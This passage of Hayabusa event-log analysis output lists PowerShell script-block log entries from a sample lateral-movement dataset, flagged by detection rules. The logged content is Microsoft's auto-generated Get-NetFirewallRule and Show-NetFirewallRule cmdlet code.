[string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ 
Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssoci",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') 